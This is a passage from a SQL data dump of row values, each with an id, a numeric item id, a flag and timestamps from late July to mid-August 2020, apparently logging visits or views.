13:44:15'),(4566,2813,1,'2020-07-29','2020-07-29 13:50:03'),(4567,2769,1,'2020-07-29','2020-07-29 14:15:47'),(4568,3104,1,'2020-07-29','2020-07-29 14:16:53'),(4569,3083,1,'2020-07-29','2020-07-29 14:28:36'),(4570,1600,1,'2020-07-29','2020-07-29 14:38:46'),(4571,1608,1,'2020-07-29','2020-07-29 14:57:21'),(4572,2801,1,'2020-07-29','2020-07-29 15:07:16'),(4573,2410,1,'2020-07-29','2020-07-29 15:38:08'),(4574,1749,1,'2020-07-29','2020-07-29 15:47:17'),(4575,1600,1,'2020-07-29','2020-07-29 15:48:05'),(4576,3109,1,'2020-07-29','2020-07-29 15:50:24'),(4577,80,1,'2020-07-29','2020-07-29 16:08:43'),(4578,80,1,'2020-07-29','2020-07-29 16:17:37'),(4579,2457,1,'2020-07-29','2020-07-29 16:27:50'),(4580,1588,1,'2020-07-29','2020-07-29 16:32:44'),(4581,2989,1,'2020-07-29','2020-07-29 16:37:40'),(4582,76,1,'2020-07-29','2020-07-29 16:47:23'),(4583,2309,1,'2020-07-29','2020-07-29 17:46:29'),(4584,2609,1,'2020-07-29','2020-07-29 17:58:20'),(4585,2801,1,'2020-07-29','2020-07-29 18:26:21'),(4586,1695,1,'2020-07-29','2020-07-29 18:38:50'),(4587,479,1,'2020-07-29','2020-07-29 19:07:37'),(4588,2609,1,'2020-07-29','2020-07-29 19:08:56'),(4589,2904,1,'2020-07-29','2020-07-29 19:59:26'),(4590,1604,1,'2020-07-29','2020-07-29 20:08:09'),(4591,1730,1,'2020-07-29','2020-07-29 20:09:31'),(4592,3069,1,'2020-07-29','2020-07-29 20:18:09'),(4593,1730,1,'2020-07-29','2020-07-29 20:19:11'),(4594,2617,1,'2020-07-29','2020-07-29 20:41:52'),(4595,2617,1,'2020-07-29','2020-07-29 20:48:08'),(4596,91,1,'2020-07-29','2020-07-29 21:30:27'),(4597,1718,1,'2020-07-29','2020-07-29 21:49:45'),(4598,2769,1,'2020-07-29','2020-07-29 22:59:38'),(4599,2813,1,'2020-07-29','2020-07-29 23:15:25'),(4600,3104,1,'2020-07-29','2020-07-29 23:29:58'),(4601,3027,1,'2020-07-29','2020-07-29 23:48:38'),(4602,1588,1,'2020-07-30','2020-07-30 00:40:11'),(4603,1600,1,'2020-07-30','2020-07-30 01:00:49'),(4604,2309,1,'2020-07-30','2020-07-30 01:20:37'),(4605,1600,1,'2020-07-30','2020-07-30 01:30:48'),(4606,1604,1,'2020-07-30','2020-07-30 01:41:03'),(4607,1588,1,'2020-07-30','2020-07-30 01:50:43'),(4608,2801,1,'2020-07-30','2020-07-30 02:11:16'),(4609,2801,1,'2020-07-30','2020-07-30 02:27:35'),(4610,3109,1,'2020-07-30','2020-07-30 02:41:22'),(4611,1718,1,'2020-07-30','2020-07-30 02:51:29'),(4612,91,1,'2020-07-30','2020-07-30 03:00:53'),(4613,1608,1,'2020-07-30','2020-07-30 03:41:16'),(4614,2769,1,'2020-07-30','2020-07-30 03:51:13'),(4615,80,1,'2020-07-30','2020-07-30 04:01:33'),(4616,80,1,'2020-07-30','2020-07-30 04:38:15'),(4617,89,1,'2020-07-30','2020-07-30 04:54:07'),(4618,2457,1,'2020-07-30','2020-07-30 05:03:15'),(4619,2410,1,'2020-07-30','2020-07-30 05:30:07'),(4620,3102,1,'2020-07-30','2020-07-30 05:32:18'),(4621,3107,1,'2020-07-30','2020-07-30 05:48:08'),(4622,335,1,'2020-07-30','2020-07-30 05:53:12'),(4623,2775,1,'2020-07-30','2020-07-30 07:18:24'),(4624,2609,1,'2020-07-30','2020-07-30 07:25:41'),(4625,2911,1,'2020-07-30','2020-07-30 08:21:08'),(4626,570,1,'2020-07-30','2020-07-30 08:37:50'),(4627,2813,1,'2020-07-30','2020-07-30 08:38:24'),(4628,1588,1,'2020-07-30','2020-07-30 08:41:52'),(4629,72,1,'2020-07-30','2020-07-30 08:53:13'),(4630,1582,1,'2020-07-30','2020-07-30 09:26:01'),(4631,2751,1,'2020-07-30','2020-07-30 10:18:19'),(4632,108,1,'2020-07-30','2020-07-30 10:31:19'),(4633,2904,1,'2020-07-30','2020-07-30 10:31:46'),(4634,68,1,'2020-07-30','2020-07-30 10:32:23'),(4635,89,1,'2020-07-30','2020-07-30 10:32:47'),(4636,1588,1,'2020-07-30','2020-07-30 10:33:06'),(4637,89,1,'2020-07-30','2020-07-30 11:28:09'),(4638,1614,1,'2020-07-30','2020-07-30 12:52:40'),(4639,1614,1,'2020-07-30','2020-07-30 13:08:19'),(4640,2617,1,'2020-07-30','2020-07-30 13:13:56'),(4641,1730,1,'2020-07-30','2020-07-30 14:58:33'),(4642,570,1,'2020-07-30','2020-07-30 15:58:42'),(4643,89,1,'2020-07-30','2020-07-30 16:40:27'),(4644,2813,1,'2020-07-30','2020-07-30 17:28:28'),(4645,1588,1,'2020-07-30','2020-07-30 17:38:52'),(4646,87,1,'2020-07-30','2020-07-30 17:45:13'),(4647,474,1,'2020-07-30','2020-07-30 17:48:42'),(4648,474,1,'2020-07-30','2020-07-30 17:49:42'),(4649,87,1,'2020-07-30','2020-07-30 17:49:56'),(4650,477,1,'2020-07-30','2020-07-30 17:50:07'),(4651,87,1,'2020-07-30','2020-07-30 17:50:31'),(4652,3066,1,'2020-07-30','2020-07-30 19:04:47'),(4653,3030,1,'2020-07-30','2020-07-30 20:37:03'),(4654,2309,1,'2020-07-30','2020-07-30 21:10:13'),(4655,3030,1,'2020-07-30','2020-07-30 21:27:26'),(4656,1600,1,'2020-07-30','2020-07-30 22:20:56'),(4657,80,1,'2020-07-30','2020-07-30 23:40:45'),(4658,2609,1,'2020-07-30','2020-07-30 23:41:20'),(4659,1604,1,'2020-07-31','2020-07-31 00:11:28'),(4660,1715,1,'2020-07-31','2020-07-31 00:35:53'),(4661,1600,1,'2020-07-31','2020-07-31 00:43:18'),(4662,80,1,'2020-07-31','2020-07-31 01:02:11'),(4663,3069,1,'2020-07-31','2020-07-31 01:25:29'),(4664,3030,1,'2020-07-31','2020-07-31 01:29:57'),(4665,91,1,'2020-07-31','2020-07-31 02:23:09'),(4666,1730,1,'2020-07-31','2020-07-31 03:22:30'),(4667,2801,1,'2020-07-31','2020-07-31 05:23:41'),(4668,2609,1,'2020-07-31','2020-07-31 06:12:31'),(4669,570,1,'2020-07-31','2020-07-31 06:26:02'),(4670,2769,1,'2020-07-31','2020-07-31 07:09:46'),(4671,3104,1,'2020-07-31','2020-07-31 07:14:34'),(4672,3104,1,'2020-07-31','2020-07-31 09:12:31'),(4673,2904,1,'2020-07-31','2020-07-31 10:22:48'),(4674,72,1,'2020-07-31','2020-07-31 10:22:59'),(4675,1600,1,'2020-07-31','2020-07-31 12:12:52'),(4676,1588,1,'2020-07-31','2020-07-31 12:52:47'),(4677,1588,1,'2020-07-31','2020-07-31 12:56:13'),(4678,80,1,'2020-07-31','2020-07-31 13:42:54'),(4679,2457,1,'2020-07-31','2020-07-31 18:47:45'),(4680,2309,1,'2020-07-31','2020-07-31 20:20:54'),(4681,3069,1,'2020-07-31','2020-07-31 20:55:44'),(4682,1730,1,'2020-07-31','2020-07-31 21:34:56'),(4683,3030,1,'2020-07-31','2020-07-31 21:37:33'),(4684,3030,1,'2020-07-31','2020-07-31 21:59:44'),(4685,3030,1,'2020-08-01','2020-08-01 00:43:04'),(4686,68,1,'2020-08-01','2020-08-01 00:51:11'),(4687,2457,1,'2020-08-01','2020-08-01 01:45:30'),(4688,2813,1,'2020-08-01','2020-08-01 02:14:23'),(4689,80,1,'2020-08-01','2020-08-01 02:26:38'),(4690,3058,1,'2020-08-01','2020-08-01 06:32:25'),(4691,1600,1,'2020-08-01','2020-08-01 07:18:13'),(4692,3099,1,'2020-08-01','2020-08-01 08:10:36'),(4693,2991,1,'2020-08-01','2020-08-01 08:22:07'),(4694,1588,1,'2020-08-01','2020-08-01 09:38:20'),(4695,2309,1,'2020-08-01','2020-08-01 10:59:35'),(4696,2609,1,'2020-08-01','2020-08-01 13:13:47'),(4697,1582,1,'2020-08-01','2020-08-01 14:24:53'),(4698,1582,1,'2020-08-01','2020-08-01 14:25:30'),(4699,2769,1,'2020-08-01','2020-08-01 14:26:54'),(4700,1582,1,'2020-08-01','2020-08-01 14:28:17'),(4701,1600,1,'2020-08-01','2020-08-01 15:00:58'),(4702,1730,1,'2020-08-01','2020-08-01 16:41:37'),(4703,2801,1,'2020-08-01','2020-08-01 16:51:44'),(4704,2309,1,'2020-08-01','2020-08-01 17:30:49'),(4705,2309,1,'2020-08-01','2020-08-01 17:30:49'),(4706,2309,1,'2020-08-01','2020-08-01 18:04:04'),(4707,2309,1,'2020-08-01','2020-08-01 18:04:05'),(4708,570,1,'2020-08-01','2020-08-01 18:11:45'),(4709,1730,1,'2020-08-01','2020-08-01 18:31:54'),(4710,1604,1,'2020-08-01','2020-08-01 18:59:03'),(4711,3030,1,'2020-08-01','2020-08-01 19:49:12'),(4712,80,1,'2020-08-01','2020-08-01 20:15:20'),(4713,3027,1,'2020-08-01','2020-08-01 21:07:24'),(4714,3058,1,'2020-08-01','2020-08-01 21:24:09'),(4715,1600,1,'2020-08-02','2020-08-02 00:35:19'),(4716,1588,1,'2020-08-02','2020-08-02 01:06:13'),(4717,80,1,'2020-08-02','2020-08-02 01:46:38'),(4718,2309,1,'2020-08-02','2020-08-02 05:18:48'),(4719,1730,1,'2020-08-02','2020-08-02 05:28:38'),(4720,2410,1,'2020-08-02','2020-08-02 06:05:08'),(4721,2609,1,'2020-08-02','2020-08-02 06:08:43'),(4722,1604,1,'2020-08-02','2020-08-02 06:59:11'),(4723,2801,1,'2020-08-02','2020-08-02 09:00:30'),(4724,2457,1,'2020-08-02','2020-08-02 14:58:27'),(4725,80,1,'2020-08-02','2020-08-02 18:31:22'),(4726,1588,1,'2020-08-02','2020-08-02 19:11:36'),(4727,1730,1,'2020-08-02','2020-08-02 19:51:42'),(4728,1588,1,'2020-08-02','2020-08-02 20:39:24'),(4729,2801,1,'2020-08-02','2020-08-02 21:26:00'),(4730,3058,1,'2020-08-02','2020-08-02 22:42:30'),(4731,486,1,'2020-08-02','2020-08-02 23:38:25'),(4732,2989,1,'2020-08-03','2020-08-03 01:38:27'),(4733,1600,1,'2020-08-03','2020-08-03 03:40:19'),(4734,1600,1,'2020-08-03','2020-08-03 04:05:06'),(4735,1730,1,'2020-08-03','2020-08-03 04:25:19'),(4736,2309,1,'2020-08-03','2020-08-03 05:20:33'),(4737,1600,1,'2020-08-03','2020-08-03 07:34:38'),(4738,2989,1,'2020-08-03','2020-08-03 09:34:15'),(4739,1588,1,'2020-08-03','2020-08-03 09:43:04'),(4740,486,1,'2020-08-03','2020-08-03 11:32:31'),(4741,1614,1,'2020-08-03','2020-08-03 11:54:12'),(4742,89,1,'2020-08-03','2020-08-03 12:05:04'),(4743,91,1,'2020-08-03','2020-08-03 12:06:48'),(4744,2609,1,'2020-08-03','2020-08-03 12:34:53'),(4745,2309,1,'2020-08-03','2020-08-03 13:04:53'),(4746,1606,1,'2020-08-03','2020-08-03 14:10:00'),(4747,1604,1,'2020-08-03','2020-08-03 15:15:04'),(4748,1604,1,'2020-08-03','2020-08-03 15:23:07'),(4749,1588,1,'2020-08-03','2020-08-03 15:43:01'),(4750,2159,1,'2020-08-03','2020-08-03 21:05:57'),(4751,1606,1,'2020-08-04','2020-08-04 02:37:26'),(4752,3107,1,'2020-08-04','2020-08-04 02:57:29'),(4753,87,1,'2020-08-04','2020-08-04 02:59:23'),(4754,1705,1,'2020-08-04','2020-08-04 05:41:59'),(4755,1606,1,'2020-08-04','2020-08-04 10:31:04'),(4756,68,1,'2020-08-04','2020-08-04 10:31:41'),(4757,3090,1,'2020-08-04','2020-08-04 10:37:55'),(4758,76,1,'2020-08-04','2020-08-04 10:39:04'),(4759,3004,1,'2020-08-04','2020-08-04 10:42:18'),(4760,1612,1,'2020-08-04','2020-08-04 10:42:47'),(4761,76,1,'2020-08-04','2020-08-04 10:44:34'),(4762,1612,1,'2020-08-04','2020-08-04 10:45:31'),(4763,2769,1,'2020-08-04','2020-08-04 14:11:21'),(4764,570,1,'2020-08-05','2020-08-05 08:32:46'),(4765,1614,1,'2020-08-05','2020-08-05 16:54:44'),(4766,1600,1,'2020-08-05','2020-08-05 19:19:32'),(4767,1715,1,'2020-08-05','2020-08-05 19:20:02'),(4768,1600,1,'2020-08-05','2020-08-05 19:21:01'),(4769,1743,1,'2020-08-05','2020-08-05 21:31:30'),(4770,1600,1,'2020-08-06','2020-08-06 00:36:56'),(4771,2309,1,'2020-08-06','2020-08-06 01:34:19'),(4772,1604,1,'2020-08-06','2020-08-06 02:34:25'),(4773,91,1,'2020-08-06','2020-08-06 02:50:19'),(4774,2152,1,'2020-08-06','2020-08-06 02:50:52'),(4775,108,1,'2020-08-06','2020-08-06 05:45:13'),(4776,80,1,'2020-08-06','2020-08-06 06:14:55'),(4777,1766,1,'2020-08-06','2020-08-06 09:49:09'),(4778,3081,1,'2020-08-06','2020-08-06 09:56:38'),(4779,1588,1,'2020-08-06','2020-08-06 09:57:44'),(4780,3069,1,'2020-08-06','2020-08-06 10:14:11'),(4781,3104,1,'2020-08-06','2020-08-06 10:15:54'),(4782,1614,1,'2020-08-06','2020-08-06 11:48:38'),(4783,570,1,'2020-08-06','2020-08-06 11:56:08'),(4784,570,1,'2020-08-06','2020-08-06 13:26:10'),(4785,80,1,'2020-08-06','2020-08-06 13:56:43'),(4786,68,1,'2020-08-06','2020-08-06 14:54:38'),(4787,87,1,'2020-08-06','2020-08-06 14:59:11'),(4788,91,1,'2020-08-06','2020-08-06 15:00:38'),(4789,89,1,'2020-08-06','2020-08-06 15:01:12'),(4790,89,1,'2020-08-06','2020-08-06 15:02:28'),(4791,2813,1,'2020-08-06','2020-08-06 15:19:43'),(4792,1741,1,'2020-08-06','2020-08-06 16:29:16'),(4793,2309,1,'2020-08-06','2020-08-06 20:02:44'),(4794,1600,1,'2020-08-06','2020-08-06 20:12:47'),(4795,108,1,'2020-08-06','2020-08-06 20:52:47'),(4796,1600,1,'2020-08-06','2020-08-06 23:13:32'),(4797,80,1,'2020-08-07','2020-08-07 01:04:48'),(4798,1588,1,'2020-08-07','2020-08-07 03:54:11'),(4799,1614,1,'2020-08-07','2020-08-07 04:05:57'),(4800,2769,1,'2020-08-07','2020-08-07 04:16:06'),(4801,1730,1,'2020-08-07','2020-08-07 04:37:12'),(4802,91,1,'2020-08-07','2020-08-07 05:16:07'),(4803,3027,1,'2020-08-07','2020-08-07 07:02:44'),(4804,1600,1,'2020-08-07','2020-08-07 07:57:31'),(4805,2309,1,'2020-08-07','2020-08-07 12:42:46'),(4806,1604,1,'2020-08-07','2020-08-07 13:16:05'),(4807,3041,1,'2020-08-07','2020-08-07 13:58:13'),(4808,2457,1,'2020-08-07','2020-08-07 14:22:41'),(4809,80,1,'2020-08-07','2020-08-07 15:13:25'),(4810,80,1,'2020-08-07','2020-08-07 15:14:27'),(4811,2609,1,'2020-08-07','2020-08-07 15:39:15'),(4812,1600,1,'2020-08-07','2020-08-07 16:10:22'),(4813,3027,1,'2020-08-07','2020-08-07 17:08:05'),(4814,2813,1,'2020-08-07','2020-08-07 17:19:31'),(4815,2252,1,'2020-08-07','2020-08-07 17:21:01'),(4816,2813,1,'2020-08-07','2020-08-07 17:25:26'),(4817,2801,1,'2020-08-07','2020-08-07 17:25:40'),(4818,2309,1,'2020-08-07','2020-08-07 17:34:39'),(4819,2956,1,'2020-08-07','2020-08-07 19:11:47'),(4820,108,1,'2020-08-07','2020-08-07 19:29:16'),(4821,1709,1,'2020-08-07','2020-08-07 20:48:50'),(4822,488,1,'2020-08-07','2020-08-07 21:08:33'),(4823,3030,1,'2020-08-07','2020-08-07 22:21:46'),(4824,1732,1,'2020-08-07','2020-08-07 23:19:13'),(4825,3030,1,'2020-08-08','2020-08-08 01:36:36'),(4826,108,1,'2020-08-08','2020-08-08 01:39:39'),(4827,3072,1,'2020-08-08','2020-08-08 03:45:56'),(4828,1592,1,'2020-08-08','2020-08-08 04:16:46'),(4829,108,1,'2020-08-08','2020-08-08 05:36:45'),(4830,3041,1,'2020-08-08','2020-08-08 07:19:54'),(4831,2154,1,'2020-08-08','2020-08-08 08:29:10'),(4832,2309,1,'2020-08-08','2020-08-08 10:13:59'),(4833,2309,1,'2020-08-08','2020-08-08 10:14:04'),(4834,2252,1,'2020-08-08','2020-08-08 14:23:32'),(4835,108,1,'2020-08-08','2020-08-08 14:43:16'),(4836,2956,1,'2020-08-08','2020-08-08 15:13:24'),(4837,1709,1,'2020-08-08','2020-08-08 15:23:22'),(4838,3030,1,'2020-08-08','2020-08-08 16:19:16'),(4839,108,1,'2020-08-08','2020-08-08 23:55:48'),(4840,2252,1,'2020-08-09','2020-08-09 01:53:55'),(4841,108,1,'2020-08-09','2020-08-09 01:58:49'),(4842,2956,1,'2020-08-09','2020-08-09 03:11:57'),(4843,2751,1,'2020-08-09','2020-08-09 05:00:00'),(4844,1709,1,'2020-08-09','2020-08-09 05:31:17'),(4845,3041,1,'2020-08-09','2020-08-09 09:05:30'),(4846,3081,1,'2020-08-09','2020-08-09 10:08:08'),(4847,108,1,'2020-08-09','2020-08-09 15:49:35'),(4848,488,1,'2020-08-09','2020-08-09 16:40:20'),(4849,80,1,'2020-08-09','2020-08-09 21:46:16'),(4850,72,1,'2020-08-10','2020-08-10 09:10:31'),(4851,335,1,'2020-08-10','2020-08-10 09:11:09'),(4852,91,1,'2020-08-10','2020-08-10 09:11:39'),(4853,2989,1,'2020-08-10','2020-08-10 11:37:00'),(4854,1614,1,'2020-08-10','2020-08-10 12:30:51'),(4855,3030,1,'2020-08-10','2020-08-10 12:49:52'),(4856,1766,1,'2020-08-10','2020-08-10 12:51:34'),(4857,80,1,'2020-08-10','2020-08-10 12:52:19'),(4858,108,1,'2020-08-10','2020-08-10 12:56:15'),(4859,80,1,'2020-08-10','2020-08-10 12:58:07'),(4860,2904,1,'2020-08-10','2020-08-10 12:59:59'),(4861,2904,1,'2020-08-10','2020-08-10 13:01:43'),(4862,2252,1,'2020-08-10','2020-08-10 13:37:29'),(4863,1718,1,'2020-08-10','2020-08-10 14:07:46'),(4864,1718,1,'2020-08-10','2020-08-10 14:31:14'),(4865,108,1,'2020-08-10','2020-08-10 15:06:32'),(4866,1600,1,'2020-08-10','2020-08-10 15:34:06'),(4867,68,1,'2020-08-10','2020-08-10 15:55:24'),(4868,3081,1,'2020-08-10','2020-08-10 16:33:09'),(4869,1600,1,'2020-08-10','2020-08-10 18:02:45'),(4870,2989,1,'2020-08-10','2020-08-10 18:37:52'),(4871,2956,1,'2020-08-10','2020-08-10 18:51:44'),(4872,1614,1,'2020-08-10','2020-08-10 19:54:58'),(4873,68,1,'2020-08-10','2020-08-10 19:55:55'),(4874,1614,1,'2020-08-10','2020-08-10 19:56:07'),(4875,1709,1,'2020-08-10','2020-08-10 22:02:31'),(4876,2457,1,'2020-08-11','2020-08-11 00:03:43'),(4877,1614,1,'2020-08-11','2020-08-11 00:13:22'),(4878,1600,1,'2020-08-11','2020-08-11 01:25:58'),(4879,486,1,'2020-08-11','2020-08-11 01:32:06'),(4880,1699,1,'2020-08-11','2020-08-11 03:20:18'),(4881,1606,1,'2020-08-11','2020-08-11 07:15:52'),(4882,2252,1,'2020-08-11','2020-08-11 12:40:59'),(4883,2956,1,'2020-08-11','2020-08-11 13:51:17'),(4884,2457,1,'2020-08-11','2020-08-11 14:05:01'),(4885,1718,1,'2020-08-11','2020-08-11 15:25:55'),(4886,3030,1,'2020-08-11','2020-08-11 15:33:02'),(4887,1614,1,'2020-08-11','2020-08-11 16:39:54'),(4888,108,1,'2020-08-11','2020-08-11 16:42:05'),(4889,1709,1,'2020-08-11','2020-08-11 18:13:21'),(4890,3081,1,'2020-08-12','2020-08-12 00:06:05'),(4891,3030,1,'2020-08-12','2020-08-12 02:36:44'),(4892,1614,1,'2020-08-12','2020-08-12 08:19:21'),(4893,2178,1,'2020-08-12','2020-08-12 09:47:44'),(4894,1588,1,'2020-08-12','2020-08-12 13:01:20'),(4895,80,1,'2020-08-12','2020-08-12 13:04:54'),(4896,1588,1,'2020-08-12','2020-08-12 13:05:48'),(4897,1588,1,'2020-08-12','2020-08-12 13:05:54'),(4898,76,1,'2020-08-12','2020-08-12 15:27:22'),(4899,68,1,'2020-08-12','2020-08-12 15:27:40'),(4900,87,1,'2020-08-12','2020-08-12 15:29:03'),(4901,89,1,'2020-08-12','2020-08-12 15:29:30'),(4902,91,1,'2020-08-12','2020-08-12 15:31:27'),(4903,474,1,'2020-08-12','2020-08-12 17:25:07'),(4904,1604,1,'2020-08-12','2020-08-12 18:52:15'),(4905,2956,1,'2020-08-12','2020-08-12 23:19:35'),(4906,108,1,'2020-08-12','2020-08-12 23:25:31'),(4907,3030,1,'2020-08-13','2020-08-13 00:01:11'),(4908,1718,1,'2020-08-13','2020-08-13 02:38:53'),(4909,1718,1,'2020-08-13','2020-08-13 02:49:43'),(4910,1614,1,'2020-08-13','2020-08-13 03:18:24'),(4911,1614,1,'2020-08-13','2020-08-13 03:25:00'),(4912,2658,1,'2020-08-13','2020-08-13 07:15:51'),(4913,2904,1,'2020-08-13','2020-08-13 07:34:04'),(4914,2658,1,'2020-08-13','2020-08-13 07:59:35'),(4915,1604,1,'2020-08-13','2020-08-13 10:54:49'),(4916,68,1,'2020-08-13','2020-08-13 10:56:11'),(4917,1604,1,'2020-08-13','2020-08-13 10:56:57'),(4918,1604,1,'2020-08-13','2020-08-13 10:57:57'),(4919,2457,1,'2020-08-13','2020-08-13 11:29:21'),(4920,1606,1,'2020-08-13','2020-08-13 13:23:14'),(4921,108,1,'2020-08-13','2020-08-13 16:27:29'),(4922,89,1,'2020-08-13','2020-08-13 18:08:56'),(4923,91,1,'2020-08-13','2020-08-13 18:13:05'),(4924,2956,1,'2020-08-13','2020-08-13 18:35:14'),(4925,108,1,'2020-08-13','2020-08-13 18:47:41'),(4926,2457,1,'2020-08-13','2020-08-13 22:34:33'),(4927,2309,1,'2020-08-14','2020-08-14 00:02:26'),(4928,2609,1,'2020-08-14','2020-08-14 00:12:14'),(4929,1600,1,'2020-08-14','2020-08-14 00:52:07'),(4930,1730,1,'2020-08-14','2020-08-14 01:01:46'),(4931,91,1,'2020-08-14','2020-08-14 01:26:02'),(4932,108,1,'2020-08-14','2020-08-14 02:23:44'),(4933,1588,1,'2020-08-14','2020-08-14 02:32:42'),(4934,1600,1,'2020-08-14','2020-08-14 02:52:21'),(4935,2309,1,'2020-08-14','2020-08-14 03:02:52'),(4936,80,1,'2020-08-14','2020-08-14 03:42:05'),(4937,1588,1,'2020-08-14','2020-08-14 03:52:04'),(4938,1582,1,'2020-08-14','2020-08-14 04:41:54'),(4939,1614,1,'2020-08-14','2020-08-14 04:42:26'),(4940,89,1,'2020-08-14','2020-08-14 05:12:12'),(4941,84,1,'2020-08-14','2020-08-14 05:32:05'),(4942,2769,1,'2020-08-14','2020-08-14 05:52:10'),(4943,3109,1,'2020-08-14','2020-08-14 06:12:31'),(4944,3102,1,'2020-08-14','2020-08-14 06:22:36'),(4945,3107,1,'2020-08-14','2020-08-14 06:46:24'),(4946,80,1,'2020-08-14','2020-08-14 06:53:27'),(4947,76,1,'2020-08-14','2020-08-14 07:34:12'),(4948,68,1,'2020-08-14','2020-08-14 07:44:15'),(4949,2751,1,'2020-08-14','2020-08-14 08:19:12'),(4950,72,1,'2020-08-14','2020-08-14 09:14:59'),(4951,3104,1,'2020-08-14','2020-08-14 10:13:56'),(4952,2964,1,'2020-08-14','2020-08-14 10:44:05'),(4953,335,1,'2020-08-14','2020-08-14 11:54:53'),(4954,1600,1,'2020-08-14','2020-08-14 14:27:59'),(4955,477,1,'2020-08-14','2020-08-14 15:15:36'),(4956,2309,1,'2020-08-14','2020-08-14 15:15:45'),(4957,91,1,'2020-08-14','2020-08-14 15:23:52'),(4958,89,1,'2020-08-14','2020-08-14 15:25:15'),(4959,1582,1,'2020-08-14','2020-08-14 15:25:18'),(4960,1588,1,'2020-08-14','2020-08-14 16:56:23'),(4961,1588,1,'2020-08-14','2020-08-14 16:59:01'),(4962,1588,1,'2020-08-14','2020-08-14 17:00:43'),(4963,1592,1,'2020-08-14','2020-08-14 19:01:11'),(4964,570,1,'2020-08-14','2020-08-14 19:30:42'),(4965,1782,1,'2020-08-14','2020-08-14 19:39:02'),(4966,72,1,'2020-08-14','2020-08-14 19:44:49'),(4967,1772,1,'2020-08-14','2020-08-14 19:57:07'),(4968,2993,1,'2020-08-14','2020-08-14 20:39:12'),(4969,1766,1,'2020-08-14','2020-08-14 21:12:05'),(4970,1770,1,'2020-08-14','2020-08-14 21:37:52'),(4971,1612,1,'2020-08-14','2020-08-14 23:43:17'),(4972,1722,1,'2020-08-14','2020-08-14 23:46:30'),(4973,2558,1,'2020-08-15','2020-08-15 00:20:04'),(4974,1588,1,'2020-08-15','2020-08-15 01:12:43'),(4975,80,1,'2020-08-15','2020-08-15 01:23:14'),(4976,1600,1,'2020-08-15','2020-08-15 02:43:10'),(4977,2309,1,'2020-08-15','2020-08-15 02:52:35'),(4978,1600,1,'2020-08-15','2020-08-15 03:02:41'),(4979,2309,1,'2020-08-15','2020-08-15 03:12:50'),(4980,1588,1,'2020-08-15','2020-08-15 03:53:26'),(4981,3107,1,'2020-08-15','2020-08-15 03:56:44'),(4982,2769,1,'2020-08-15','2020-08-15 04:13:44'),(4983,76,1,'2020-08-15','2020-08-15 04:54:05'),(4984,1730,1,'2020-08-15','2020-08-15 05:04:04'),(4985,3109,1,'2020-08-15','2020-08-15 05:58:29'),(4986,89,1,'2020-08-15','2020-08-15 06:19:07'),(4987,3104,1,'2020-08-15','2020-08-15 06:53:05'),(4988,335,1,'2020-08-15','2020-08-15 07:15:50'),(4989,1588,1,'2020-08-15','2020-08-15 10:16:43'),(4990,2809,1,'2020-08-15','2020-08-15 10:34:35'),(4991,91,1,'2020-08-15','2020-08-15 10:43:13'),(4992,1602,1,'2020-08-15','2020-08-15 11:21:24'),(4993,3069,1,'2020-08-15','2020-08-15 11:42:42'),(4994,2508,1,'2020-08-15','2020-08-15 14:30:42'),(4995,3096,1,'2020-08-15','2020-08-15 14:33:56'),(4996,2911,1,'2020-08-15','2020-08-15 14:51:22'),(4997,2704,1,'2020-08-15','2020-08-15 16:18:05'),(4998,470,1,'2020-08-15','2020-08-15 16:22:52'),(4999,1726,1,'2020-08-15','2020-08-15 16:48:46'),(5000,1872,1,'2020-08-15','2020-08-15 17:41:25'),(5001,1582,1,'2020-08-15','2020-08-15 17:44:35'),(5002,2490,1,'2020-08-15','2020-08-15 18:22:22'),(5003,471,1,'2020-08-15','2020-08-15 19:11:24'),(5004,1766,1,'2020-08-15','2020-08-15 19:13:13'),(5005,483,1,'2020-08-15','2020-08-15 19:34:55'),(5006,1713,1,'2020-08-15','2020-08-15 20:10:00'),(5007,1711,1,'2020-08-15','2020-08-15 21:00:01'),(5008,1600,1,'2020-08-15','2020-08-15 22:40:42'),(5009,2309,1,'2020-08-15','2020-08-15 22:50:38'),(5010,1600,1,'2020-08-15','2020-08-15 23:00:34'),(5011,1588,1,'2020-08-15','2020-08-15 23:10:33'),(5012,3104,1,'2020-08-15','2020-08-15 23:35:33'),(5013,2309,1,'2020-08-15','2020-08-15 23:40:14'),(5014,479,1,'2020-08-16','2020-08-16 00:00:35'),(5015,1737,1,'2020-08-16','2020-08-16 00:11:57'),(5016,1737,1,'2020-08-16','2020-08-16 00:11:59'),(5017,2178,1,'2020-08-16','2020-08-16 00:52:21'),(5018,3087,1,'2020-08-16','2020-08-16 02:02:54'),(5019,1590,1,'2020-08-16','2020-08-16 02:13:52'),(5020,2989,1,'2020-08-16','2020-08-16 02:26:27'),(5021,484,1,'2020-08-16','2020-08-16 03:51:59'),(5022,2609,1,'2020-08-16','2020-08-16 04:01:50'),(5023,477,1,'2020-08-16','2020-08-16 04:11:43'),(5024,1592,1,'2020-08-16','2020-08-16 04:31:44'),(5025,2609,1,'2020-08-16','2020-08-16 04:41:58'),(5026,2609,1,'2020-08-16','2020-08-16 05:14:46'),(5027,2609,1,'2020-08-16','2020-08-16 05:15:05'),(5028,2609,1,'2020-08-16','2020-08-16 05:15:30'),(5029,2609,1,'2020-08-16','2020-08-16 05:19:29'),(5030,2609,1,'2020-08-16','2020-08-16 05:19:31'),(5031,2609,1,'2020-08-16','2020-08-16 05:19:33'),(5032,1594,1,'2020-08-16','2020-08-16 05:22:03'),(5033,2609,1,'2020-08-16','2020-08-16 05:29:04'),(5034,472,1,'2020-08-16','2020-08-16 05:29:28'),(5035,2457,1,'2020-08-16','2020-08-16 06:22:13'),(5036,1606,1,'2020-08-16','2020-08-16 09:47:50'),(5037,1586,1,'2020-08-16','2020-08-16 13:08:22'),(5038,1586,1,'2020-08-16','2020-08-16 13:08:41'),(5039,1586,1,'2020-08-16','2020-08-16 13:08:56'),(5040,2617,1,'2020-08-16','2020-08-16 13:09:47'),(5041,1588,1,'2020-08-16','2020-08-16 16:46:32'),(5042,80,1,'2020-08-16','2020-08-16 16:46:47'),(5043,80,1,'2020-08-16','2020-08-16 16:46:49'),(5044,1588,1,'2020-08-16','2020-08-16 16:47:51'),(5045,1600,1,'2020-08-16','2020-08-16 23:48:14'),(5046,2609,1,'2020-08-17','2020-08-17 00:18:35'),(5047,72,1,'2020-08-17','2020-08-17 04:58:42'),(5048,3102,1,'2020-08-17','2020-08-17 06:21:50'),(5049,1600,1,'2020-08-17','2020-08-17 08:47:21'),(5050,2309,1,'2020-08-17','2020-08-17 15:28:59'),(5051,2609,1,'2020-08-17','2020-08-17 17:03:53'),(5052,2457,1,'2020-08-17','2020-08-17 